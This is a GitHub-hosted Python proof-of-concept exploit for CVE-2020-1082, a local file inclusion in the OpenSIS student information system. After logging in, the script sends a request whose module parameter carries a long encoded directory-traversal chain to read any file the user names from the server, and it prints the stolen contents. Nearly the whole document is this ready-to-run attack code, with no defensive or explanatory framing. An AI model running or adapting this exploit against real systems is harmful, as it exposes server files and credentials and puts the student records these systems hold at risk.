-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2020-1082-opensis-lfi.py
54 lines (43 loc) · 2.98 KB
/
CVE-2020-1082-opensis-lfi.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
import requests
import argparse
from bs4 import BeautifulSoup
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",
}
def extract_file(session, args):
print(f"[+] Extracting {args.file}...")
vuln_url = f"http://{args.host}/Modules.php?modname=grades%2fReportCards.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..{args.file}&modfunc=&search_modfunc=list&next_modname=students/Student.php"
data = "last=&first=&stuid=&altid=&addr=&grade=§ion=&sql_save_session=true&mp_comment=&middle_name=&common_name=&GENDER=ÐNICITY=&LANGUAGE=&email=&phone=&username=&day_from_birthdate=&month_from_birthdate=&day_to_birthdate=&month_to_birthdate=&day_dob_birthdate=&month_dob_birthdate=&year_dob_birthdate=&day_from_est=&month_from_est=&year_from_est=&day_to_est=&month_to_est=&year_to_est=&day_from_st=&month_from_st=&year_from_st=&day_to_st=&month_to_st=&year_to_st=&day_from_en=&month_from_en=&year_from_en=&day_to_en=&month_to_en=&year_to_en=&home_address_1=&home_address_2=&home_city=&home_state=&home_zip=&home_busno=&mail_address_1=&mail_address_2=&mail_city=&mail_state=&mail_zip=&primary_realtionship=&primary_first_name=&primary_second_name=&primary_home_phone=&primary_work_phone=&primary_mobile_phone=&primary_email=&secondary_realtionship=&secondary_first_name=&secondary_second_name=&secondary_home_phone=&secondary_work_phone=&secondary_mobile_phone=&secondary_email=&goal_title=&goal_description=&progress_name=&progress_description=&med_month=&med_day=&med_year=&doctors_note_comments=&type=&imm_month=&imm_day=&imm_year=&imm_comments=&ma_month=&ma_day=&ma_year=&med_alrt_title=&nv_month=&nv_day=&nv_year=&reason=&result=&med_vist_comments=&_search_all_schools=Y"
response = session.post(
vuln_url, data=data, headers=headers, verify=False, allow_redirects=False,
)
soup = BeautifulSoup(response.text, "html.parser")
print(soup.find(id="update_panel").get_text())
def login(session, args):
print("[+] Logging in...")
login_url = f"http://{args.host}/index.php"
data = f"USERNAME={args.username}&PASSWORD={args.password}&log="
session.post(login_url, data=data, headers=headers, verify=False)
return session
def main():
parser = argparse.ArgumentParser(description="CVE-2020-1082 OpenSIS LFI PoC.")
parser.add_argument(
"--host", help="The host to target. Format example: https://host:port",
)
parser.add_argument(
"--username", help="The username to login with",
)
parser.add_argument(
"--password", help="The password to login with",
)
parser.add_argument("--file", help="The file to extract")
args = parser.parse_args()
if not args.host or not args.username or not args.password or not args.file:
parser.print_help()
exit(0)
session = requests.Session()
session = login(session, args)
extract_file(session, args)
if __name__ == "__main__":
main()